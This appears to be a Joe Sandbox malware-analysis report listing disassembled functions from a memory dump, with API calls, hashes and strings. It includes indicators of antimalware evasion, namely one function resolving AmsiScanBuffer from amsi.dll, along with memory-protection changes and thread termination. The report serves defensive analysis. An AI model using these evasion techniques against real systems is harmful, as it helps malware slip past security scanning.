Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 9a89fe46c5e97ff38c11a66a76c55e0e3d0bd114bb149d782d44bb708ce91cf0
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: AD119896334681A1FE1477F2671D36E3D515B84798F544524AC5F5E7EECD28C8F14700

Function 0000022413901A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000022413901A56
K32GetModuleFileNameExW.KERNEL32 ref: 0000022413901A74
PathFindFileNameW.SHLWAPI ref: 0000022413901A83
lstrlenW.KERNEL32 ref: 0000022413901A8F
StrCpyW.SHLWAPI ref: 0000022413901AA2
CloseHandle.KERNEL32 ref: 0000022413901AB0

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: c0a3b6a09fb925a5add5b0a1d2986aa8e1ee5e029dfafc02e8a54fdd4d366d1c
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 1E018B61720A4092EA10EB92A88834977A1F788FD8F894034DE4D57758DF38C996C340

Function 0000022413931A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000022413931A56
K32GetModuleFileNameExW.KERNEL32 ref: 0000022413931A74
PathFindFileNameW.SHLWAPI ref: 0000022413931A83
lstrlenW.KERNEL32 ref: 0000022413931A8F
StrCpyW.SHLWAPI ref: 0000022413931AA2
CloseHandle.KERNEL32 ref: 0000022413931AB0

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 8e67b5a141409fd048b4dbc2385198524401762d670e2bf2ead7599378418e12
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 50015B65720A4092EE20EBA2E95835977A1F788FC8F484034DE4D87B68DE38C995C740

Function 0000022413903E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000022413903AAC), ref: 0000022413903E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022413903AAC), ref: 0000022413903E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022413903AAC), ref: 0000022413903E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022413903AAC), ref: 0000022413903E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022413903AAC), ref: 0000022413903E9F
TerminateThread.KERNEL32(?,?,?,?,?,0000022413903AAC), ref: 0000022413903EAE

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: a00d2c6ae47c2e80c689bb35f0f152edc1bee7607894d45dcc6afd9ac796b98c
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: C9011B69221B40D2EF24EBA1E84C7167BA4AB45B59F080024CE4D1A36CEF3DC9A8C700

Function 0000022413933E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000022413933AAC), ref: 0000022413933E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022413933AAC), ref: 0000022413933E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022413933AAC), ref: 0000022413933E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022413933AAC), ref: 0000022413933E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022413933AAC), ref: 0000022413933E9F
TerminateThread.KERNEL32(?,?,?,?,?,0000022413933AAC), ref: 0000022413933EAE

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: a5b292c7cf9d069f3b258e9537cd8b6052efdc237937ba094c80e6ceae999238
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 59011BA9221740D2EF34ABE1E94C7157BA0AB45B49F040025CD4D0A76CEF3DC4E8C700

Function 0000022413901AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000022413901AF4
StrCmpNIW.SHLWAPI ref: 0000022413901B0E
lstrlenW.KERNEL32 ref: 0000022413901B1D
StrCpyW.SHLWAPI ref: 0000022413901B32

Strings

\\?\, xrefs: 0000022413901B02

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: fb3fd3352bb2d8e6ba2f9927d31222ee6532609a58683f9ec4c8d094aff9dcec
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 5AF03C62324685E2EF60ABA1E5883597B61F744B9CF884021DE4D4A95CDF6CCAE9CB00

Function 0000022413931AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000022413931AF4
StrCmpNIW.SHLWAPI ref: 0000022413931B0E
lstrlenW.KERNEL32 ref: 0000022413931B1D
StrCpyW.SHLWAPI ref: 0000022413931B32

Strings

\\?\, xrefs: 0000022413931B02

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: b50c632942447cf0a9abd2777fead785a21b9bb0f9a94f0df33e2622780756e1
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 46F04961324685E1EF20ABA1FA883597771F744BCCF844021DE4D4A96CEE7CC6E8C700

Function 000002241390B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002241390B929
GetProcAddress.KERNEL32 ref: 000002241390B93F
FreeLibrary.KERNEL32 ref: 000002241390B95B

Strings

mscoree.dll, xrefs: 000002241390B920
CorExitProcess, xrefs: 000002241390B938

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: f329678ab49624899b51cc9199976e66558ccd330fcf22870c52a77c45e323dc
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 89F09621320701A1FE10BB9498983597B24EB457B8F580619DEBE5D5ECCF2CC8D8C340

Function 0000022413903708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000002241390275A), ref: 000002241390372A
StrCpyW.SHLWAPI ref: 000002241390373A
StrCatW.SHLWAPI ref: 0000022413903746
PathCombineW.SHLWAPI(?,?,00000000,000002241390275A), ref: 0000022413903754

Strings

\\.\pipe\, xrefs: 0000022413903720

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 86a1f76325fe174a4e04d6d10a4910e311ba62286f4e296a24583343b1b3637b
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: C2F08954324B80D1EE046B97B958119BA55B748FD4F494030ED0E5FB1CCF6CC8A68700

Function 000002241393B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002241393B929
GetProcAddress.KERNEL32 ref: 000002241393B93F
FreeLibrary.KERNEL32 ref: 000002241393B95B

Strings

mscoree.dll, xrefs: 000002241393B920
CorExitProcess, xrefs: 000002241393B938

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 5c0836342293d25b5eaa0e43f8a1606ced04965f5b279579bf749c49b5dcc0a5
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: C2F01261321601A1EE14ABA4D9993597B60AB4576CF5407199E6D4D5F8CF2CC8A8C740

Function 0000022413933708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000002241393275A), ref: 000002241393372A
StrCpyW.SHLWAPI ref: 000002241393373A
StrCatW.SHLWAPI ref: 0000022413933746
PathCombineW.SHLWAPI(?,?,00000000,000002241393275A), ref: 0000022413933754

Strings

\\.\pipe\, xrefs: 0000022413933720

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 581b608e50ca20baecc8f784d030a3228e919175aa4bb26d6fd17132214ace6f
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 94F05454324B80E1EE14AB96FA581197A50A748FC8F444030ED0E4BF1DDE28C4A58700

Function 0000022413931E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0000022413931E47
GetProcAddress.KERNEL32 ref: 0000022413931E57
Sleep.KERNEL32 ref: 0000022413931E67

Strings

AmsiScanBuffer, xrefs: 0000022413931E50
amsi.dll, xrefs: 0000022413931E40

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 5d53d0d81957059d61f44c4dc5528ceb4523e772e2785e25a4f3c627f1f18e48
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: A8D06794632640F6EE287BD1EA5D3543B61AB68F49FC44415CD0E096B8DE2D89F98740

Function 0000022413905810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000022413905896

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: bc0db52c1ada9e772fc07a355cbae7f8ff707f7532caf864a79bcb03dffeaad3
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 4402B93262DB84D6EB60DB55E49435ABBA5F3C5798F104015EACE8BBA8DF7CC494CB00

Function 0000022413935810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000022413935896

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 6fd28fde26d5e6138cbba11b4bef24289d4c0e0eff5abab047aefc85b8a4376d
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 3602CC76129B84D6EB60DB55F59435ABBA1F3C8798F104015EA8E8BBACDF7CC494CB00

Function 0000022413902C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000022413902CAD
TlsGetValue.KERNEL32 ref: 0000022413902CBC
TlsGetValue.KERNEL32 ref: 0000022413902CCB
TlsSetValue.KERNEL32 ref: 0000022413902E0F
TlsSetValue.KERNEL32 ref: 0000022413902E1E
TlsSetValue.KERNEL32 ref: 0000022413902E2D

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: e0dee242169ad69e50c59c98ba92cdc6448f2eb479820ff82c54d9559718464b
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 79511636324600A7EB64EF95E44865A7BA8F388B88F504059DE9E4B75CCF38C8E5CB00

Function 0000022413932C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000022413932CAD
TlsGetValue.KERNEL32 ref: 0000022413932CBC
TlsGetValue.KERNEL32 ref: 0000022413932CCB
TlsSetValue.KERNEL32 ref: 0000022413932E0F
TlsSetValue.KERNEL32 ref: 0000022413932E1E
TlsSetValue.KERNEL32 ref: 0000022413932E2D

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: 4d2f920399fe31b19180a18007b302bc0dcf189a3960ce94e46abedb0857534f
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: A1512B76320600A7EF64EFA5E54866A7BA0F788B48F504019DE9E4BB6CCF39C8D5C700

Function 0000022413902AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000022413902AE1
TlsGetValue.KERNEL32 ref: 0000022413902AF0
TlsGetValue.KERNEL32 ref: 0000022413902AFF
TlsSetValue.KERNEL32 ref: 0000022413902C3B
TlsSetValue.KERNEL32 ref: 0000022413902C4A
TlsSetValue.KERNEL32 ref: 0000022413902C59

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: bc879426f79ae1264d95c646d3564b8edad53a37d6c7bf0ef7e08a1aa6f05486
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: E9510835334601A7EB64EF96E44862A7BA8F385B98F504158DE8E4B75CDF38C8E5CB00

Function 0000022413932AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000022413932AE1
TlsGetValue.KERNEL32 ref: 0000022413932AF0
TlsGetValue.KERNEL32 ref: 0000022413932AFF
TlsSetValue.KERNEL32 ref: 0000022413932C3B
TlsSetValue.KERNEL32 ref: 0000022413932C4A
TlsSetValue.KERNEL32 ref: 0000022413932C59

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 48eaf12f242f73fd77a8c970bd7a161f7efa624203064066d01bbe4909f670be
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: F751F775220601A7EF24EFA6E54861A7BB0F389B88F504159DE8E4B76CDF39C8D5CB00

Function 0000022413905E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000022413905E66

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

